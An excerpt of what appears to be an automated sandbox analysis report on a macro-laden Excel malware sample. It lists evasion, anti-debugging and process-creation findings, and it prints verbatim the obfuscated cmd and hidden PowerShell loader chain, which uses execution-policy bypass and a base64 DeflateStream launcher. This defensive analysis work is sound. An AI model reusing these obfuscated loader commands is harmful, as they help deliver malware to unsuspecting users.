Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Document contains an embedded VBA which only executes on specific systems (country or language check)
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : a()opa = Application.International(xlCountrySetting) + 960
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : lace("" + Format(0, "currency"), "0", "")End FunctionFunc
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 216 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1900 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984 | Thread sleep time: -922337203685477s >= -30000s
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '[base64 payload omitted]
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '[base64 payload omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )

Language, Device and Operating System Detection: